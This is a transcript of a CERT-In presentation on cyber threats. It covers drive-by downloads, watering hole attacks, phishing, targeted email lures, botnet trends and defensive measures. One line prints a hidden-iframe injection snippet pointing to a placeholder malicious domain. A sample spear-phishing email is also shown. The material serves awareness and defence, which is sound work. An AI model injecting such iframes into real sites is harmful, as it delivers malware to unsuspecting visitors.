Cyber Security Threats Landscape - Cert-In
Transcript of Cyber Security Threats Landscape - Cert-In
Cyber Security Threat Landscape
Bhupendra Singh Awasya, GCIH, GREM
Indian Computer Emergency Response Team (CERT-In)
Ministry of Communications and Information Technology Department of Information Technology
Government of India
Topics of Discussion
• Cyber security incident trends • Drive-by-download • Watering hole attack • Client side/Targeted attacks/RATS
• Mobile malware threats • DNS Changer Malware • Actions of Government
– Cyber Security Policy – Crisis Management
• Cyber security best practices – expectation from organizations • Current challenges and way forward
Threats
Any circumstances or event that has the potential to cause harm to a system or network .That means, that even the existence of an (unknown) vulnerability implies a threat by definition. [CERT]
Any circumstances or event that has the potential to cause harm to a system or network. That means, that even the existence of an (unknown) vulnerability implies a threat by definition. [CERT]
An event, the occurrence of which could have an undesirable impact on the well-being of an asset. (ISC)2 International Information Systems Security Certification Consortium
A Threat can be either • Intentional (i.e., intelligent; e.g., an individual
cracker or a criminal organization)
• Accidental (e.g., the possibility of a computer malfunctioning, or the possibility of an "act of God" such as an earthquake, a fire, or a tornado)
• Or a circumstance, Unintentional, By-chance
Understanding Threats
•Employees •Malicious intended guys •Ignorant •Non-employees •Outside attackers •Natural disasters
•Disruption of Service •Expose sensitive information •Alter information •Damage information •Delete information •Funny jokes •Publicity, peer recognition •Monetary gain •Revenge/Defaming others •Political means •Terrorism •Curiosity, testing skills/system
•Social Engineering •Virus, Trojan horses, worms •Key-loggers •Exploitation of vulnerabilities •Packet replay •Packet modification •IP spoofing •Mail bombing •Various hacking tools •Password cracking •Cross-site scripting •SQL injection
•Transmission Threats •Eavesdropping/Sniffer •DoS/DDoS •Covert channel •Spoofing •Tunneling •Masquerading/man-in-the middle attacks
•Malicious Code Threats •Virus •Worms •Trojans •Spyware/Adware •Logic Bombs •Backdoors •Bots
•Password Threats •Password crackers
•Social engineering •Dumpster diving •Impersonation •Shoulder surfing
•Physical Threats •Physical access •Spying
•Application Threats •Buffer overflows •SQL Injection •Cross-site Scripting
•Improper usage/Un-authorized access •Hackers •Greyhats, Whitehats, Black hats •Internal intruders •Defacement •Open Proxy- Spam •Phishing
•Other Threats •Mobile code
Classification of Information Security Threats
National level
• Cyber Terrorism • Attacks on Critical
Infrastructure • Web defacement • Website intrusion and
malware propagation • Malicious Code • Scanning and probing • Denial of Service &
Distributed Denial of Service
• Cyber espionage
Organisational level
• Website intrusion/ defacement
• Domain stalking • Malicious Code • Scanning and probing • Denial of Service &
Distributed Denial of Service
• Targeted attacks • Phishing • Data theft • Insider threats • Financial frauds
Individual level
• Social Engineering • Email hacking & misuse • Identity theft & phishing • Financial scams • Abuse through emails • Abuse through Social
Networking sites • Laptop theft
Cyber threats
Few years ago, 2006 and earlier, “No one ever thought of spreading
malware via legitimate websites.”
Drive-by-download
• Downloads which a person authorized but without understanding the consequences
(e.g. downloads which install an unknown or counterfeit executable program, ActiveX component, or Java applet).
• Any download that happens without a person's knowledge. • Download of spyware, a computer virus or any kind of malware
that happens without a person's knowledge.
Unintended download of computer software from the Internet:
1.2 Infect a legitimate website
1.1 Create a Malicious website
Legitimate website
Malicious website
Attacker
2 User request legitimate website
3 Website response including malicious code
4 User’s browser request for content from malicious website
5 Malicious website successfully delivers malware/virus
Legitimate user’s system
Req.
Resp.
Connect Attacker
Malware authors are shifting their focus
from traditional desktop bases attack methodology to the new emerging
dynamic and user interactive web applications for spreading malware
Watering Hole Attack Watering Hole is a computer attack strategy identified in 2012 by RSA. * The “watering hole” attack consists to inject malicious code onto the public Web pages of a site that the targets use to visit. * The attacker wants to target a particular group (organization, industry, or region). The attack consists of three phases:
– Guess (or observe) which websites the group often uses. – Infect one or more of these websites with malware. – Eventually, some member of the targeted group will get infected.
Initially exploited Internet Explorer zero-day vulnerability
Why attackers are using this . . .
In this attack vector, attackers will Compromise a legitimate website and plant a piece of malicious code in it, which will be served to all legitimate users of that website.
How do they do ??? • Web defacement
– Exploitation of Application vulnerabilities (Joomla, PHP, ASP, JSP, CPanel vuln. etc)
– SQL Injection – RFI/LFI – Hacking of credentials (admin) – Web shells
• Website intrusion and malware propagation
– SQL injection (automated) – Asprox botnet – Gumblar (stolen FTP credentials) – Toolkits – Mpack, Neosploit, Luckysploit, Phoenix, Crimepack
etc
Once the malware/virus is planted on user's computer, a remote attacker/hacker can: - Access on the infected computer - Steal user credentials, banking or other passwords - Use as a launching pad for further attacks - Install more sophisticated malwares/viruses - Gain chain of access to corporate networks via VPN etc for which user or user's system is allowed for.
<iframe src=”http://malicious.domain/” width=0 height=0 OR style=”visibility:hidden;position:absolute”></iframe>
Stolen admin credentials
Another popular vector, other than SQL injection and cross-site scripting is Stealing FTP service credentials.
Most of the websites are managed their website contents via FTP uploads.
Gumblar Gumblar performs the following tasks: - Stealing FTP credentials - Send SPAM - Install fake anti-malware - Google search/query hijacking - Disabling security software like desktop firewall and antivirus
Attackers can: - Use URL shortening services like, http://tinyurl.com/
http://bit.ly/ For hiding the actual URL - Upload malicious code embedded (PDF, DOC, XLS, SWF, PPT)
- iFrame, JavaScript code in comment fields
Social engineering • How an unwitting user become more
social? “Social engineering is the act of manipulating people into
performing actions or divulging confidential information.”
• Intentions: – Phishing/ Financial Frauds – Malware Propagation – Nigerian (419) scams
Social engineering Scams
– Advance fee fraud/ Nigerian(419) Scams • Term "419" refers to the article of the Nigerian Criminal Code
"Obtaining Property by false pretences; Cheating“, dealing with fraud • Variants
– Purchasing goods and services – Check cashing – Lottery scam – Fake job offer – Beneficiary of a will – Charity scams – Friend/Lost wallet scam – Fraud recovery scams – and many many more….
Phishing
• The term Phishing is derived from ‘fishing’ password + fishing = phishing
“Phishing is the act of sending a communication
(Email/Message/Fax/SMS) to a user falsely claiming to be an legitimate enterprise/Brand in an attempt to scam the unsuspecting user into disclosing sensitive private information that will be used for identity theft. ”
Attack on client side software
• PDF Reader/ Flash • Microsoft office applications • Takes place normally via interesting and
relevant email / local language with Microsoft Office/ PDF attachments. Can be hosted on websites are lure the victim to get it opened.
• Designed to target a specific individual or organisation
• Aim is to extract sensitive/valuable information
Attack tool kits – Vulnerabilities exploited
Source: Exploitkits overview - Kaspersky Labs
Targeted attacks - example
From: Sr Manager [mailto:[email protected]] Sent: Tuesday, 19 January, 2010 5:14 PM To: [email protected] bcc: [email protected], [email protected] Subject: Urgent document for agenda items for the coming meeting Dear Mr. (Target) I am attaching the agenda items for a probable meeting for discussing briefing points for the board meeting. For confidentiality reasons the attached file is password protected, the password for the attached file is:- “abc123”. Please have a look and send your comments and input material to me ASAP. Regards Ram Mathur
BlackHat SEO • SEO poisoning
BlackHat SEO is a maliciously-motivated search engine optimization technique that takes advantage of search engine functionality to promote malicious websites to the top of search results.
• How a search can be poisoned??? Typically upload PHP scripts to the compromised sites. Scripts query Google’s trending topic service and then generate relevant HTML for the hottest search terms.
– Campaigns seen: holidays, sales events, natural disasters, much anticipated product announcements, sporting events, celebrity gossip,
TV shows, and popular toys.
Recent trends shows Google Image Indexes are poisoned
Rouge for MAC OS X • MAC Defender
– http://www.cert-in.org.in/s2cMainServlet?pageid=PUBVA01&VACODE=CIVA-2011-1185
Most popular technique for identity theft seen:
MESSAGE OFFERS A “SPECTACULAR VIDEO OR CLAIMS “YOU APPEAR IN THIS CLIP The bait normally comes from the profile of a friend whose account has already been hacked.
Users typically receive a message (which appears to be genuine) suggesting the recipient clicks a link for one reason or another. In most cases, the message offers a “spectacular video” or claims “you appear in this clip”, or catchy themes to be lured easily, and normally includes the user name of the recipient.
39
Malware through facebook
Links to malicious sites
Attack toolkit geo aware
Malware delivery to few countries
Facebook like jack
• 4 million computers infected.
• Exploited default username password in DSL routers
and also used other malwares like Koboface to spread.
• The malware hijack the domain name system (DNS) on infected systems.
• The FBI shut the operation and used temporary servers to give people time to fix the problem and still use their computers.
Mobile Threats
• The mobile counterparts. • Zitmo(Zeus In The Mobile),
Spitmo(SpyeyeIn The Mobile), carberp • Multitude among almost the major
platforms.(Android, Symbian, Blackberry)
Quick Response Code (QR Code)
Use your tablet or phone camera to scan this image to visit our website!
• Visit our Website @
!! What if Setup by Attacker- Social-Engineer Toolkit (SET) for Launching Attack!!
Web-Application Attacks
• Low-hanging Fruit – In-house developed- **Develop your website just Rs. 500/-**.
• “75% of all attacks occurring at application layer”—Gartner
• “8 out of 10 websites are vulnerable to attack”—WhiteHat Security Team
• Web apps account for 80 percent of internet vulnerabilities
Attacks • Cross Site Scripting (XSS) • SQL Injection • Cross Site Request Forgery (XSRF) • Malicious File Upload • Remote File Inclusion (RFI) • Command Injection ….& more
Botnet trends - India
2102 1279
15160
8514
6182 5537 74753
7055 5903 5219
6435 8866
277697
590362 630025
1495485
453076
68824 28854
188295 202478 96114
49759
28197
35659
158851 69183
1736353
2116482
39600 32242
263196
153196
274224
617365
0
500000
1000000
1500000
2000000
2500000 Ja
n/08
Feb/
08
Mar
/08
Apr/0
8
May
/08
Jun/
08
Jul/0
8
Aug/
08
Sep/
08
Oct
/08
Nov
/08
Dec
/08
Jan/
09
Feb/
09
Mar
/09
Apr/0
9
May
/09
Jun/
09
Jul/0
9
Aug/
09
Sep/
09
Oct
/09
Nov
/09
Dec
/09
Jan/
10
Feb/
10
Mar
/10
Apr/1
0
May
/10
Jun/
10
Jul/1
0
Aug/
10
Sep/
10
Oct
/10
Nov
/10
Dec
/10
Conficker
Mariposa
883025
583138
508125
178710
89319
77778
72152
51815
35078
32691
22969
18062
16316
11200
10479
9884
7667
7529
4363
3973
0 100000 200000 300000 400000 500000 600000 700000 800000 900000 1000000
torpig
dnschanger
mebroot
Ponmocup
Gozi
spam
ZeuS
TDSS
Artro
SpyEye
irc
DDoS.DirtJumper
Carberp
Gbot
honeypot
Oficla
pushdo
Ramnit
DDoS_DirtJumper
DDoS.Armageddon
Botnet trends (Top 20 Infection) India (2011)
1552529
63041
62872
62653
43881
10116
5041
4781
3841
3688
3096
3054
2725
2514
2293
1446
1368
1303
1281
1185
1062
0 200000 400000 600000 800000 1000000 1200000 1400000 1600000 1800000
ZeroAccess
pushdo
Sality_Virus
zeus
spam
Pushdo_Spambot
GameOver_Zeus
zeus-p2p
Beebone
grum
torpig
slenfbot.5050
Neurevt
DDoS_DirtJumper
Virut_botnet
Pony
blackenergy
Ransomware
Dofoil
TDSS
KeySpy
Botnet trends – October 2013
Attack tool kits • Web attacker .. • Mpack..Fragus • Neosploit, Luckysploit, Icepack • Blackhole, Eleonore • Zeus
– Random registry keys (RC4 Encryption)- Multiple compromises of victim by different attackers using same kit – difficult to clean
• Mariposa – HTTP Post stealing, blended defense mechanisms
• SpyEye – competes with Zeus
6 Levels of simultaneous action • Government
– Policy, Plan, IT Act, Directives, CMP • Public – Private Partnership
– Joint Working Group • Technical
– Honeypots, sensors, situational awareness, R&D • CIIP and CERT
– Section 70A and 70B of IT Act • Individual /Professional
– Awareness & capacity building • International
– Information sharing and cooperation
Security of Cyber Space – Snap shot of efforts
• Enabling legal framework
• Cyber security assurance framework (product, process, technology and people)
• Alert and advisory framework – Network of National CERT and sectoral CERTs
• Capacity building framework – training & awareness and skilled manpower
• Critical Information Infrastructure Protection (CIIP)
• Cyber security research and development
• Information sharing and cooperation framework – National and International
• Public private partnership (JWG)
Security of Cyber Space – Snap shot of efforts
8 Frameworks for focused action
Actions at organisational level • Security policies and procedures • CSIRT/CISO/Administrator/Users • Multi-layered defense mechanism
– Network behavior analysis – Perimeter Defense – Security Information and Event Management – Database Activity Monitoring
• Updated/Patched applications • Host based Intrusion Prevention System • Content inspection systems/DPI at perimeter, DLP • Pre defined procedures for information sharing • Authentication & authorisation to secure information and prevent data
leakage • Authentication of emails (Digital signatures) • Auditing and Pentest • User awareness
Way forward … • Fostering collaboration between Government and Industry
• Implementation of security best practices based on global standards
• Use of validated and certified IT products and devices
– India is an Authorizing Nation under Common Criteria Recognition Arrangement (CCRA)
• Creation of mechanisms for auditing of Industrial Control systems and associated IT systems and Empanelment of ICS Auditors
• Secure application / software development process
• Information exchange on vulnerabilities and threats in trusted manner
• Creation of Incident Response teams at entity level
• Capacity building
• Mock drills for improving security posture of CII including simulated attacks on ICS devices
Thank you
Incident Response Helpdesk
Phone: 1800 11 4949
FAX: 1800 11 6969
e-mail: [email protected]
http://www.cert-in.org.in